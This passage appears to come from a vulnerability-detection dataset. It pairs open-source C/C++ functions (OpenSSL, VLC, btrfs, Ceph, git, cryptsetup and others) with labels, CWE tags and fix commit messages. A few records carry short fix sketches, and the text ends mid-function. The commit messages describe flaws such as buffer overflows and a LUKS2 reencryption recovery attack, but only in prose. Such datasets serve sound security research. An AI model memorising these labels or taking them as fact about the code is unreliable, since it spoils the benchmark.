that negative matches still succeed against %NULL.
What about "match.interface-name=*"? That probably
should also match with %NULL. So we treat %NULL really
like "".
Against commit 11cd443448bc ('iwd: Don't call IWD methods when device
unmanaged'), we got this backtrace:
#0 0x00007f1c164069f1 in __strnlen_avx2 () at ../sysdeps/x86_64/multiarch/strlen-avx2.S:62
#1 0x00007f1c1637ac9e in __fnmatch (pattern=<optimized out>, string=<optimized out>, string@entry=0x0, flags=flags@entry=0) at fnmatch.c:379
p = 0x0
res = <optimized out>
orig_pattern = <optimized out>
n = <optimized out>
wpattern = 0x7fff8d860730 L"pci-0000:03:00.0"
ps = {__count = 0, __value = {__wch = 0, __wchb = "\000\000\000"}}
wpattern_malloc = 0x0
wstring_malloc = 0x0
wstring = <optimized out>
alloca_used = 80
__PRETTY_FUNCTION__ = "__fnmatch"
#2 0x0000564484a978bf in nm_wildcard_match_check (str=0x0, patterns=<optimized out>, num_patterns=<optimized out>) at src/core/nm-core-utils.c:1959
is_inverted = 0
is_mandatory = 0
match = <optimized out>
p = 0x564486c43fa0 "pci-0000:03:00.0"
has_optional = 0
has_any_optional = 0
i = <optimized out>
#3 0x0000564484bf4797 in check_connection_compatible (self=<optimized out>, connection=<optimized out>, error=0x0) at src/core/devices/nm-device.c:7499
patterns = <optimized out>
device_driver = 0x564486c76bd0 "veth"
num_patterns = 1
priv = 0x564486cbe0b0
__func__ = "check_connection_compatible"
device_iface = <optimized out>
local = 0x564486c99a60
conn_iface = 0x0
klass = <optimized out>
s_match = 0x564486c63df0 [NMSettingMatch]
#4 0x0000564484c38491 in check_connection_compatible (device=0x564486cbe590 [NMDeviceVeth], connection=0x564486c6b160, error=0x0) at src/core/devices/nm-device-ethernet.c:348
self = 0x564486cbe590 [NMDeviceVeth]
s_wired = <optimized out>
Fixes: 3ced486f4162 ('libnm/match: extend syntax for match patterns with '|', '&', '!' and '\\'')
https://bugzilla.redhat.com/show_bug.cgi?id=1942741
|
irc_nick_valid (struct t_irc_channel *channel, struct t_irc_nick *nick)
{
struct t_irc_nick *ptr_nick;
if (!channel || !nick)
return 0;
for (ptr_nick = channel->nicks; ptr_nick; ptr_nick = ptr_nick->next_nick)
{
if (ptr_nick == nick)
return 1;
}
/* nick not found */
return 0;
}
| 0 |
[
"CWE-120",
"CWE-787"
] |
weechat
|
40ccacb4330a64802b1f1e28ed9a6b6d3ca9197f
| 82,895,173,431,155,250,000,000,000,000,000,000,000 | 16 |
irc: fix crash when a new message 005 is received with longer nick prefixes
Thanks to Stuart Nevans Locke for reporting the issue.
|
DLLEXPORT int tjDecompress(tjhandle handle, unsigned char *jpegBuf,
unsigned long jpegSize, unsigned char *dstBuf,
int width, int pitch, int height, int pixelSize,
int flags)
{
if (flags & TJ_YUV)
return tjDecompressToYUV(handle, jpegBuf, jpegSize, dstBuf, flags);
else
return tjDecompress2(handle, jpegBuf, jpegSize, dstBuf, width, pitch,
height, getPixelFormat(pixelSize, flags), flags);
}
| 0 |
[
"CWE-787"
] |
libjpeg-turbo
|
3d9c64e9f8aa1ee954d1d0bb3390fc894bb84da3
| 265,611,439,161,511,630,000,000,000,000,000,000,000 | 11 |
tjLoadImage(): Fix int overflow/segfault w/big BMP
Fixes #304
|
int ssl3_connect(SSL *s)
{
BUF_MEM *buf = NULL;
unsigned long Time = (unsigned long)time(NULL);
void (*cb) (const SSL *ssl, int type, int val) = NULL;
int ret = -1;
int new_state, state, skip = 0;
RAND_add(&Time, sizeof(Time), 0);
ERR_clear_error();
clear_sys_error();
if (s->info_callback != NULL)
cb = s->info_callback;
else if (s->ctx->info_callback != NULL)
cb = s->ctx->info_callback;
s->in_handshake++;
if (!SSL_in_init(s) || SSL_in_before(s))
SSL_clear(s);
#ifndef OPENSSL_NO_HEARTBEATS
/*
* If we're awaiting a HeartbeatResponse, pretend we already got and
* don't await it anymore, because Heartbeats don't make sense during
* handshakes anyway.
*/
if (s->tlsext_hb_pending) {
s->tlsext_hb_pending = 0;
s->tlsext_hb_seq++;
}
#endif
for (;;) {
state = s->state;
switch (s->state) {
case SSL_ST_RENEGOTIATE:
s->renegotiate = 1;
s->state = SSL_ST_CONNECT;
s->ctx->stats.sess_connect_renegotiate++;
/* break */
case SSL_ST_BEFORE:
case SSL_ST_CONNECT:
case SSL_ST_BEFORE | SSL_ST_CONNECT:
case SSL_ST_OK | SSL_ST_CONNECT:
s->server = 0;
if (cb != NULL)
cb(s, SSL_CB_HANDSHAKE_START, 1);
if ((s->version & 0xff00) != 0x0300) {
SSLerr(SSL_F_SSL3_CONNECT, ERR_R_INTERNAL_ERROR);
s->state = SSL_ST_ERR;
ret = -1;
goto end;
}
/* s->version=SSL3_VERSION; */
s->type = SSL_ST_CONNECT;
if (s->init_buf == NULL) {
if ((buf = BUF_MEM_new()) == NULL) {
ret = -1;
s->state = SSL_ST_ERR;
goto end;
}
if (!BUF_MEM_grow(buf, SSL3_RT_MAX_PLAIN_LENGTH)) {
ret = -1;
s->state = SSL_ST_ERR;
goto end;
}
s->init_buf = buf;
buf = NULL;
}
if (!ssl3_setup_buffers(s)) {
ret = -1;
goto end;
}
/* setup buffing BIO */
if (!ssl_init_wbio_buffer(s, 0)) {
ret = -1;
s->state = SSL_ST_ERR;
goto end;
}
/* don't push the buffering BIO quite yet */
ssl3_init_finished_mac(s);
s->state = SSL3_ST_CW_CLNT_HELLO_A;
s->ctx->stats.sess_connect++;
s->init_num = 0;
s->s3->flags &= ~SSL3_FLAGS_CCS_OK;
/*
* Should have been reset by ssl3_get_finished, too.
*/
s->s3->change_cipher_spec = 0;
break;
case SSL3_ST_CW_CLNT_HELLO_A:
case SSL3_ST_CW_CLNT_HELLO_B:
s->shutdown = 0;
ret = ssl3_client_hello(s);
if (ret <= 0)
goto end;
s->state = SSL3_ST_CR_SRVR_HELLO_A;
s->init_num = 0;
/* turn on buffering for the next lot of output */
if (s->bbio != s->wbio)
s->wbio = BIO_push(s->bbio, s->wbio);
break;
case SSL3_ST_CR_SRVR_HELLO_A:
case SSL3_ST_CR_SRVR_HELLO_B:
ret = ssl3_get_server_hello(s);
if (ret <= 0)
goto end;
if (s->hit) {
s->state = SSL3_ST_CR_FINISHED_A;
#ifndef OPENSSL_NO_TLSEXT
if (s->tlsext_ticket_expected) {
/* receive renewed session ticket */
s->state = SSL3_ST_CR_SESSION_TICKET_A;
}
#endif
} else {
s->state = SSL3_ST_CR_CERT_A;
}
s->init_num = 0;
break;
case SSL3_ST_CR_CERT_A:
case SSL3_ST_CR_CERT_B:
#ifndef OPENSSL_NO_TLSEXT
/* Noop (ret = 0) for everything but EAP-FAST. */
ret = ssl3_check_finished(s);
if (ret < 0)
goto end;
if (ret == 1) {
s->hit = 1;
s->state = SSL3_ST_CR_FINISHED_A;
s->init_num = 0;
break;
}
#endif
/* Check if it is anon DH/ECDH, SRP auth */
/* or PSK */
if (!
(s->s3->tmp.
new_cipher->algorithm_auth & (SSL_aNULL | SSL_aSRP))
&& !(s->s3->tmp.new_cipher->algorithm_mkey & SSL_kPSK)) {
ret = ssl3_get_server_certificate(s);
if (ret <= 0)
goto end;
#ifndef OPENSSL_NO_TLSEXT
if (s->tlsext_status_expected)
s->state = SSL3_ST_CR_CERT_STATUS_A;
else
s->state = SSL3_ST_CR_KEY_EXCH_A;
} else {
skip = 1;
s->state = SSL3_ST_CR_KEY_EXCH_A;
}
#else
} else
skip = 1;
s->state = SSL3_ST_CR_KEY_EXCH_A;
#endif
s->init_num = 0;
break;
case SSL3_ST_CR_KEY_EXCH_A:
case SSL3_ST_CR_KEY_EXCH_B:
ret = ssl3_get_key_exchange(s);
if (ret <= 0)
goto end;
s->state = SSL3_ST_CR_CERT_REQ_A;
s->init_num = 0;
/*
* at this point we check that we have the required stuff from
* the server
*/
if (!ssl3_check_cert_and_algorithm(s)) {
ret = -1;
s->state = SSL_ST_ERR;
goto end;
}
break;
case SSL3_ST_CR_CERT_REQ_A:
case SSL3_ST_CR_CERT_REQ_B:
ret = ssl3_get_certificate_request(s);
if (ret <= 0)
goto end;
s->state = SSL3_ST_CR_SRVR_DONE_A;
s->init_num = 0;
break;
case SSL3_ST_CR_SRVR_DONE_A:
case SSL3_ST_CR_SRVR_DONE_B:
ret = ssl3_get_server_done(s);
if (ret <= 0)
goto end;
#ifndef OPENSSL_NO_SRP
if (s->s3->tmp.new_cipher->algorithm_mkey & SSL_kSRP) {
if ((ret = SRP_Calc_A_param(s)) <= 0) {
SSLerr(SSL_F_SSL3_CONNECT, SSL_R_SRP_A_CALC);
ssl3_send_alert(s, SSL3_AL_FATAL, SSL_AD_INTERNAL_ERROR);
s->state = SSL_ST_ERR;
goto end;
}
}
#endif
if (s->s3->tmp.cert_req)
s->state = SSL3_ST_CW_CERT_A;
else
s->state = SSL3_ST_CW_KEY_EXCH_A;
s->init_num = 0;
break;
case SSL3_ST_CW_CERT_A:
case SSL3_ST_CW_CERT_B:
case SSL3_ST_CW_CERT_C:
case SSL3_ST_CW_CERT_D:
ret = ssl3_send_client_certificate(s);
if (ret <= 0)
goto end;
s->state = SSL3_ST_CW_KEY_EXCH_A;
s->init_num = 0;
break;
case SSL3_ST_CW_KEY_EXCH_A:
case SSL3_ST_CW_KEY_EXCH_B:
ret = ssl3_send_client_key_exchange(s);
if (ret <= 0)
goto end;
/*
* EAY EAY EAY need to check for DH fix cert sent back
*/
/*
* For TLS, cert_req is set to 2, so a cert chain of nothing is
* sent, but no verify packet is sent
*/
/*
* XXX: For now, we do not support client authentication in ECDH
* cipher suites with ECDH (rather than ECDSA) certificates. We
* need to skip the certificate verify message when client's
* ECDH public key is sent inside the client certificate.
*/
if (s->s3->tmp.cert_req == 1) {
s->state = SSL3_ST_CW_CERT_VRFY_A;
} else {
s->state = SSL3_ST_CW_CHANGE_A;
}
if (s->s3->flags & TLS1_FLAGS_SKIP_CERT_VERIFY) {
s->state = SSL3_ST_CW_CHANGE_A;
}
s->init_num = 0;
break;
case SSL3_ST_CW_CERT_VRFY_A:
case SSL3_ST_CW_CERT_VRFY_B:
ret = ssl3_send_client_verify(s);
if (ret <= 0)
goto end;
s->state = SSL3_ST_CW_CHANGE_A;
s->init_num = 0;
break;
case SSL3_ST_CW_CHANGE_A:
case SSL3_ST_CW_CHANGE_B:
ret = ssl3_send_change_cipher_spec(s,
SSL3_ST_CW_CHANGE_A,
SSL3_ST_CW_CHANGE_B);
if (ret <= 0)
goto end;
#if defined(OPENSSL_NO_TLSEXT) || defined(OPENSSL_NO_NEXTPROTONEG)
s->state = SSL3_ST_CW_FINISHED_A;
#else
if (s->s3->next_proto_neg_seen)
s->state = SSL3_ST_CW_NEXT_PROTO_A;
else
s->state = SSL3_ST_CW_FINISHED_A;
#endif
s->init_num = 0;
s->session->cipher = s->s3->tmp.new_cipher;
#ifdef OPENSSL_NO_COMP
s->session->compress_meth = 0;
#else
if (s->s3->tmp.new_compression == NULL)
s->session->compress_meth = 0;
else
s->session->compress_meth = s->s3->tmp.new_compression->id;
#endif
if (!s->method->ssl3_enc->setup_key_block(s)) {
ret = -1;
s->state = SSL_ST_ERR;
goto end;
}
if (!s->method->ssl3_enc->change_cipher_state(s,
SSL3_CHANGE_CIPHER_CLIENT_WRITE))
{
ret = -1;
s->state = SSL_ST_ERR;
goto end;
}
break;
#if !defined(OPENSSL_NO_TLSEXT) && !defined(OPENSSL_NO_NEXTPROTONEG)
case SSL3_ST_CW_NEXT_PROTO_A:
case SSL3_ST_CW_NEXT_PROTO_B:
ret = ssl3_send_next_proto(s);
if (ret <= 0)
goto end;
s->state = SSL3_ST_CW_FINISHED_A;
break;
#endif
case SSL3_ST_CW_FINISHED_A:
case SSL3_ST_CW_FINISHED_B:
ret = ssl3_send_finished(s,
SSL3_ST_CW_FINISHED_A,
SSL3_ST_CW_FINISHED_B,
s->method->
ssl3_enc->client_finished_label,
s->method->
ssl3_enc->client_finished_label_len);
if (ret <= 0)
goto end;
s->state = SSL3_ST_CW_FLUSH;
/* clear flags */
s->s3->flags &= ~SSL3_FLAGS_POP_BUFFER;
if (s->hit) {
s->s3->tmp.next_state = SSL_ST_OK;
if (s->s3->flags & SSL3_FLAGS_DELAY_CLIENT_FINISHED) {
s->state = SSL_ST_OK;
s->s3->flags |= SSL3_FLAGS_POP_BUFFER;
s->s3->delay_buf_pop_ret = 0;
}
} else {
#ifndef OPENSSL_NO_TLSEXT
/*
* Allow NewSessionTicket if ticket expected
*/
if (s->tlsext_ticket_expected)
s->s3->tmp.next_state = SSL3_ST_CR_SESSION_TICKET_A;
else
#endif
s->s3->tmp.next_state = SSL3_ST_CR_FINISHED_A;
}
s->init_num = 0;
break;
#ifndef OPENSSL_NO_TLSEXT
case SSL3_ST_CR_SESSION_TICKET_A:
case SSL3_ST_CR_SESSION_TICKET_B:
ret = ssl3_get_new_session_ticket(s);
if (ret <= 0)
goto end;
s->state = SSL3_ST_CR_FINISHED_A;
s->init_num = 0;
break;
case SSL3_ST_CR_CERT_STATUS_A:
case SSL3_ST_CR_CERT_STATUS_B:
ret = ssl3_get_cert_status(s);
if (ret <= 0)
goto end;
s->state = SSL3_ST_CR_KEY_EXCH_A;
s->init_num = 0;
break;
#endif
case SSL3_ST_CR_FINISHED_A:
case SSL3_ST_CR_FINISHED_B:
if (!s->s3->change_cipher_spec)
s->s3->flags |= SSL3_FLAGS_CCS_OK;
ret = ssl3_get_finished(s, SSL3_ST_CR_FINISHED_A,
SSL3_ST_CR_FINISHED_B);
if (ret <= 0)
goto end;
if (s->hit)
s->state = SSL3_ST_CW_CHANGE_A;
else
s->state = SSL_ST_OK;
s->init_num = 0;
break;
case SSL3_ST_CW_FLUSH:
s->rwstate = SSL_WRITING;
if (BIO_flush(s->wbio) <= 0) {
ret = -1;
goto end;
}
s->rwstate = SSL_NOTHING;
s->state = s->s3->tmp.next_state;
break;
case SSL_ST_OK:
/* clean a few things up */
ssl3_cleanup_key_block(s);
if (s->init_buf != NULL) {
BUF_MEM_free(s->init_buf);
s->init_buf = NULL;
}
/*
* If we are not 'joining' the last two packets, remove the
* buffering now
*/
if (!(s->s3->flags & SSL3_FLAGS_POP_BUFFER))
ssl_free_wbio_buffer(s);
/* else do it later in ssl3_write */
s->init_num = 0;
s->renegotiate = 0;
s->new_session = 0;
ssl_update_cache(s, SSL_SESS_CACHE_CLIENT);
if (s->hit)
s->ctx->stats.sess_hit++;
ret = 1;
/* s->server=0; */
s->handshake_func = ssl3_connect;
s->ctx->stats.sess_connect_good++;
if (cb != NULL)
cb(s, SSL_CB_HANDSHAKE_DONE, 1);
goto end;
/* break; */
case SSL_ST_ERR:
default:
SSLerr(SSL_F_SSL3_CONNECT, SSL_R_UNKNOWN_STATE);
ret = -1;
goto end;
/* break; */
}
/* did we do anything */
if (!s->s3->tmp.reuse_message && !skip) {
if (s->debug) {
if ((ret = BIO_flush(s->wbio)) <= 0)
goto end;
}
if ((cb != NULL) && (s->state != state)) {
new_state = s->state;
s->state = state;
cb(s, SSL_CB_CONNECT_LOOP, 1);
s->state = new_state;
}
}
skip = 0;
}
| 0 |
[
"CWE-310"
] |
openssl
|
10a70da729948bb573d27cef4459077c49f3eb46
| 129,320,876,501,705,790,000,000,000,000,000,000,000 | 475 |
client: reject handshakes with DH parameters < 768 bits.
Since the client has no way of communicating her supported parameter
range to the server, connections to servers that choose weak DH will
simply fail.
Reviewed-by: Kurt Roeckx <[email protected]>
|
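A minimal sketch of the check this commit describes, assuming the OpenSSL 1.1.0+ accessor API (the tree above predates it and reads the DH struct directly); the 768-bit floor comes from the commit message and dh_params_acceptable() is an invented name.
#include <openssl/bn.h>
#include <openssl/dh.h>
static int dh_params_acceptable(const DH *dh)
{
    const BIGNUM *p = NULL;
    DH_get0_pqg(dh, &p, NULL, NULL);
    if (p == NULL)
        return 0;
    return BN_num_bits(p) >= 768;   /* refuse weak server-chosen DH */
}
The client-side handshake would call this after parsing the ServerKeyExchange and abort on failure, which is exactly the "connections ... will simply fail" behaviour the message describes.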
static void MP4_FreeBox_hvcC(MP4_Box_t *p_box )
{
MP4_Box_data_hvcC_t *p_hvcC = p_box->data.p_hvcC;
if( p_hvcC->i_hvcC > 0 ) FREENULL( p_hvcC->p_hvcC) ;
}
| 0 |
[
"CWE-120",
"CWE-191",
"CWE-787"
] |
vlc
|
2e7c7091a61aa5d07e7997b393d821e91f593c39
| 228,113,900,776,925,770,000,000,000,000,000,000,000 | 5 |
demux: mp4: fix buffer overflow in parsing of string boxes.
We ensure that p_box->i_size is never smaller than 8 to avoid an
integer underflow in the third argument of the subsequent call to
memcpy. We also make sure no truncation occurs when passing values
derived from the 64 bit integer p_box->i_size to arguments of malloc
and memcpy that may be 32 bit integers on 32 bit platforms.
Signed-off-by: Jean-Baptiste Kempf <[email protected]>
|
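A minimal sketch of the guard this message describes, with invented names: if a 64-bit box size can be smaller than the 8-byte box header, size - 8 underflows and the subsequent memcpy copies an enormous amount, so the size is validated first (including that it fits in a size_t on 32-bit platforms).
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
static char *read_box_string(const uint8_t *payload, uint64_t box_size)
{
    if (box_size < 8 || box_size - 8 >= SIZE_MAX)   /* underflow / truncation */
        return NULL;
    size_t len = (size_t)(box_size - 8);
    char *s = malloc(len + 1);
    if (s == NULL)
        return NULL;
    memcpy(s, payload, len);                        /* len is now trustworthy */
    s[len] = '\0';
    return s;
}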
MD5& sslHashes::use_MD5(){
return md5HandShake_;
}
| 0 |
[
"CWE-254"
] |
mysql-server
|
e7061f7e5a96c66cb2e0bf46bec7f6ff35801a69
| 331,684,796,353,565,670,000,000,000,000,000,000,000 | 3 |
Bug #22738607: YASSL FUNCTION X509_NAME_GET_INDEX_BY_NID IS NOT WORKING AS EXPECTED.
|
void btrfs_put_transaction(struct btrfs_transaction *transaction)
{
WARN_ON(refcount_read(&transaction->use_count) == 0);
if (refcount_dec_and_test(&transaction->use_count)) {
BUG_ON(!list_empty(&transaction->list));
WARN_ON(!RB_EMPTY_ROOT(
&transaction->delayed_refs.href_root.rb_root));
WARN_ON(!RB_EMPTY_ROOT(
&transaction->delayed_refs.dirty_extent_root));
if (transaction->delayed_refs.pending_csums)
btrfs_err(transaction->fs_info,
"pending csums is %llu",
transaction->delayed_refs.pending_csums);
/*
* If any block groups are found in ->deleted_bgs then it's
* because the transaction was aborted and a commit did not
* happen (things failed before writing the new superblock
* and calling btrfs_finish_extent_commit()), so we can not
* discard the physical locations of the block groups.
*/
while (!list_empty(&transaction->deleted_bgs)) {
struct btrfs_block_group *cache;
cache = list_first_entry(&transaction->deleted_bgs,
struct btrfs_block_group,
bg_list);
list_del_init(&cache->bg_list);
btrfs_unfreeze_block_group(cache);
btrfs_put_block_group(cache);
}
WARN_ON(!list_empty(&transaction->dev_update_list));
kfree(transaction);
}
}
| 0 |
[
"CWE-703",
"CWE-667"
] |
linux
|
1cb3db1cf383a3c7dbda1aa0ce748b0958759947
| 85,824,400,210,390,370,000,000,000,000,000,000,000 | 34 |
btrfs: fix deadlock with concurrent chunk allocations involving system chunks
When a task attempting to allocate a new chunk verifies that there is not
currently enough free space in the system space_info and there is another
task that allocated a new system chunk but it did not finish yet the
creation of the respective block group, it waits for that other task to
finish creating the block group. This is to avoid exhaustion of the system
chunk array in the superblock, which is limited, when we have a thundering
herd of tasks allocating new chunks. This problem was described and fixed
by commit eafa4fd0ad0607 ("btrfs: fix exhaustion of the system chunk array
due to concurrent allocations").
However there are two very similar scenarios where this can lead to a
deadlock:
1) Task B allocated a new system chunk and task A is waiting on task B
to finish creation of the respective system block group. However before
task B ends its transaction handle and finishes the creation of the
system block group, it attempts to allocate another chunk (like a data
chunk for an fallocate operation for a very large range). Task B will
be unable to progress and allocate the new chunk, because task A set
space_info->chunk_alloc to 1 and therefore it loops at
btrfs_chunk_alloc() waiting for task A to finish its chunk allocation
and set space_info->chunk_alloc to 0, but task A is waiting on task B
to finish creation of the new system block group, therefore resulting
in a deadlock;
2) Task B allocated a new system chunk and task A is waiting on task B to
finish creation of the respective system block group. By the time that
task B enter the final phase of block group allocation, which happens
at btrfs_create_pending_block_groups(), when it modifies the extent
tree, the device tree or the chunk tree to insert the items for some
new block group, it needs to allocate a new chunk, so it ends up at
btrfs_chunk_alloc() and keeps looping there because task A has set
space_info->chunk_alloc to 1, but task A is waiting for task B to
finish creation of the new system block group and release the reserved
system space, therefore resulting in a deadlock.
In short, the problem is if a task B needs to allocate a new chunk after
it previously allocated a new system chunk and if another task A is
currently waiting for task B to complete the allocation of the new system
chunk.
Unfortunately this deadlock scenario introduced by the previous fix for
the system chunk array exhaustion problem does not have a simple and short
fix, and requires a big change to rework the chunk allocation code so that
chunk btree updates are all made in the first phase of chunk allocation.
And since this deadlock regression is being frequently hit on zoned
filesystems and the system chunk array exhaustion problem is triggered
in more extreme cases (originally observed on PowerPC with a node size
of 64K when running the fallocate tests from stress-ng), revert the
changes from that commit. The next patch in the series, with a subject
of "btrfs: rework chunk allocation to avoid exhaustion of the system
chunk array" does the necessary changes to fix the system chunk array
exhaustion problem.
Reported-by: Naohiro Aota <[email protected]>
Link: https://lore.kernel.org/linux-btrfs/20210621015922.ewgbffxuawia7liz@naota-xeon/
Fixes: eafa4fd0ad0607 ("btrfs: fix exhaustion of the system chunk array due to concurrent allocations")
CC: [email protected] # 5.12+
Tested-by: Shin'ichiro Kawasaki <[email protected]>
Tested-by: Naohiro Aota <[email protected]>
Signed-off-by: Filipe Manana <[email protected]>
Tested-by: David Sterba <[email protected]>
Signed-off-by: David Sterba <[email protected]>
|
int snd_line6_hw_params(struct snd_pcm_substream *substream,
struct snd_pcm_hw_params *hw_params)
{
int ret;
struct snd_line6_pcm *line6pcm = snd_pcm_substream_chip(substream);
struct line6_pcm_stream *pstr = get_stream(line6pcm, substream->stream);
mutex_lock(&line6pcm->state_mutex);
ret = line6_buffer_acquire(line6pcm, pstr, substream->stream,
LINE6_STREAM_PCM);
if (ret < 0)
goto error;
ret = snd_pcm_lib_malloc_pages(substream,
params_buffer_bytes(hw_params));
if (ret < 0) {
line6_buffer_release(line6pcm, pstr, LINE6_STREAM_PCM);
goto error;
}
pstr->period = params_period_bytes(hw_params);
error:
mutex_unlock(&line6pcm->state_mutex);
return ret;
}
| 0 |
[
"CWE-476"
] |
linux
|
3450121997ce872eb7f1248417225827ea249710
| 264,759,564,552,193,680,000,000,000,000,000,000,000 | 25 |
ALSA: line6: Fix write on zero-sized buffer
LINE6 drivers allocate the buffers based on the value returned from
usb_maxpacket() calls. The manipulated device may return zero for
this, and this results in the kmalloc() with zero size (and it may
succeed) while the other part of the driver code writes the packet
data with the fixed size -- which eventually overwrites.
This patch adds a simple sanity check for the invalid buffer size for
avoiding that problem.
Reported-by: [email protected]
Cc: <[email protected]>
Signed-off-by: Takashi Iwai <[email protected]>
|
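A kernel-style sketch of the sanity check the message calls for, assuming the modern two-argument usb_maxpacket() (older kernels take a third direction argument); line6_alloc_stream_buffer() is an invented name, not the driver's actual helper.
#include <linux/slab.h>
#include <linux/usb.h>
static int line6_alloc_stream_buffer(struct usb_device *usbdev, int pipe,
                                     void **buf, unsigned int *len)
{
    unsigned int maxpacket = usb_maxpacket(usbdev, pipe);
    if (maxpacket == 0)
        return -EINVAL;        /* manipulated device: refuse zero-sized buffer */
    *buf = kmalloc(maxpacket, GFP_KERNEL);
    if (!*buf)
        return -ENOMEM;
    *len = maxpacket;          /* fixed-size packet writes now stay in bounds */
    return 0;
}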
int AsyncConnection::send_message(Message *m)
{
FUNCTRACE();
lgeneric_subdout(async_msgr->cct, ms,
1) << "-- " << async_msgr->get_myaddr() << " --> "
<< get_peer_addr() << " -- "
<< *m << " -- " << m << " con "
<< m->get_connection().get()
<< dendl;
// optimistic think it's ok to encode(actually may broken now)
if (!m->get_priority())
m->set_priority(async_msgr->get_default_send_priority());
m->get_header().src = async_msgr->get_myname();
m->set_connection(this);
if (m->get_type() == CEPH_MSG_OSD_OP)
OID_EVENT_TRACE_WITH_MSG(m, "SEND_MSG_OSD_OP_BEGIN", true);
else if (m->get_type() == CEPH_MSG_OSD_OPREPLY)
OID_EVENT_TRACE_WITH_MSG(m, "SEND_MSG_OSD_OPREPLY_BEGIN", true);
if (async_msgr->get_myaddr() == get_peer_addr()) { //loopback connection
ldout(async_msgr->cct, 20) << __func__ << " " << *m << " local" << dendl;
std::lock_guard<std::mutex> l(write_lock);
if (can_write != WriteStatus::CLOSED) {
dispatch_queue->local_delivery(m, m->get_priority());
} else {
ldout(async_msgr->cct, 10) << __func__ << " loopback connection closed."
<< " Drop message " << m << dendl;
m->put();
}
return 0;
}
last_active = ceph::coarse_mono_clock::now();
// we don't want to consider local message here, it's too lightweight which
// may disturb users
logger->inc(l_msgr_send_messages);
bufferlist bl;
uint64_t f = get_features();
// TODO: Currently not all messages supports reencode like MOSDMap, so here
// only let fast dispatch support messages prepare message
bool can_fast_prepare = async_msgr->ms_can_fast_dispatch(m);
if (can_fast_prepare)
prepare_send_message(f, m, bl);
std::lock_guard<std::mutex> l(write_lock);
// "features" changes will change the payload encoding
if (can_fast_prepare && (can_write == WriteStatus::NOWRITE || get_features() != f)) {
// ensure the correctness of message encoding
bl.clear();
m->get_payload().clear();
ldout(async_msgr->cct, 5) << __func__ << " clear encoded buffer previous "
<< f << " != " << get_features() << dendl;
}
if (can_write == WriteStatus::CLOSED) {
ldout(async_msgr->cct, 10) << __func__ << " connection closed."
<< " Drop message " << m << dendl;
m->put();
} else {
m->trace.event("async enqueueing message");
out_q[m->get_priority()].emplace_back(std::move(bl), m);
ldout(async_msgr->cct, 15) << __func__ << " inline write is denied, reschedule m=" << m << dendl;
if (can_write != WriteStatus::REPLACING)
center->dispatch_event_external(write_handler);
}
return 0;
}
| 0 |
[
"CWE-287",
"CWE-284"
] |
ceph
|
5ead97120e07054d80623dada90a5cc764c28468
| 248,026,617,585,225,580,000,000,000,000,000,000,000 | 71 |
auth/cephx: add authorizer challenge
Allow the accepting side of a connection to reject an initial authorizer
with a random challenge. The connecting side then has to respond with an
updated authorizer proving they are able to decrypt the service's challenge
and that the new authorizer was produced for this specific connection
instance.
The accepting side requires this challenge and response unconditionally
if the client side advertises they have the feature bit. Servers wishing
to require this improved level of authentication simply have to require
the appropriate feature.
Signed-off-by: Sage Weil <[email protected]>
(cherry picked from commit f80b848d3f830eb6dba50123e04385173fa4540b)
# Conflicts:
# src/auth/Auth.h
# src/auth/cephx/CephxProtocol.cc
# src/auth/cephx/CephxProtocol.h
# src/auth/none/AuthNoneProtocol.h
# src/msg/Dispatcher.h
# src/msg/async/AsyncConnection.cc
- const_iterator
- ::decode vs decode
- AsyncConnection ctor arg noise
- get_random_bytes(), not cct->random()
|
void diff_debug_queue(const char *msg, struct diff_queue_struct *q)
{
int i;
if (msg)
fprintf(stderr, "%s\n", msg);
fprintf(stderr, "q->nr = %d\n", q->nr);
for (i = 0; i < q->nr; i++) {
struct diff_filepair *p = q->queue[i];
diff_debug_filepair(p, i);
}
}
| 0 |
[
"CWE-119"
] |
git
|
fd55a19eb1d49ae54008d932a65f79cd6fda45c9
| 238,945,759,367,792,670,000,000,000,000,000,000,000 | 11 |
Fix buffer overflow in git diff
If PATH_MAX on your system is smaller than a path stored, it may cause
buffer overflow and stack corruption in diff_addremove() and diff_change()
functions when running git-diff
Signed-off-by: Dmitry Potapov <[email protected]>
Signed-off-by: Junio C Hamano <[email protected]>
|
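A sketch of the general remedy for this class of bug: size the copy from the actual string rather than from PATH_MAX, so a stored path longer than the platform constant cannot overrun a stack buffer. dup_path() is an invented helper for illustration, not git's fix.
#include <stdlib.h>
#include <string.h>
static char *dup_path(const char *path)
{
    size_t len = strlen(path);         /* trust the string, not PATH_MAX */
    char *copy = malloc(len + 1);
    if (copy == NULL)
        abort();                       /* stand-in for git's die() */
    memcpy(copy, path, len + 1);
    return copy;
}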
void crypt_set_compatibility(struct crypt_device *cd, uint32_t flags)
{
if (cd)
cd->compatibility = flags;
}
| 0 |
[
"CWE-345"
] |
cryptsetup
|
0113ac2d889c5322659ad0596d4cfc6da53e356c
| 152,457,895,875,023,850,000,000,000,000,000,000,000 | 5 |
Fix CVE-2021-4122 - LUKS2 reencryption crash recovery attack
Fix possible attacks against data confidentiality through LUKS2 online
reencryption extension crash recovery.
An attacker can modify on-disk metadata to simulate decryption in
progress with crashed (unfinished) reencryption step and persistently
decrypt part of the LUKS device.
This attack requires repeated physical access to the LUKS device but
no knowledge of user passphrases.
The decryption step is performed after a valid user activates
the device with a correct passphrase and modified metadata.
There are no visible warnings for the user that such recovery happened
(except using the luksDump command). The attack can also be reversed
afterward (simulating crashed encryption from a plaintext) with
possible modification of revealed plaintext.
The problem was caused by reusing a mechanism designed for actual
reencryption operation without reassessing the security impact for new
encryption and decryption operations. While the reencryption requires
calculating and verifying both key digests, no digest was needed to
initiate decryption recovery if the destination is plaintext (no
encryption key). Also, some metadata (like encryption cipher) is not
protected, and an attacker could change it. Note that LUKS2 protects
visible metadata only when a random change occurs. It does not protect
against intentional modification but such modification must not cause
a violation of data confidentiality.
The fix introduces additional digest protection of reencryption
metadata. The digest is calculated from known keys and critical
reencryption metadata. Now an attacker cannot create correct metadata
digest without knowledge of a passphrase for used keyslots.
For more details, see LUKS2 On-Disk Format Specification version 1.1.0.
|
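A sketch of the core idea only, assuming OpenSSL for brevity: authenticate the otherwise-unprotected metadata with a MAC keyed by material the attacker lacks, and refuse crash recovery when it does not verify. The real LUKS2 digest construction differs; see the specification version cited above.
#include <openssl/crypto.h>
#include <openssl/evp.h>
#include <openssl/hmac.h>
static int reencrypt_metadata_ok(const unsigned char *key, size_t key_len,
                                 const unsigned char *metadata, size_t md_len,
                                 const unsigned char expected[32])
{
    unsigned char mac[EVP_MAX_MD_SIZE];
    unsigned int mac_len = 0;
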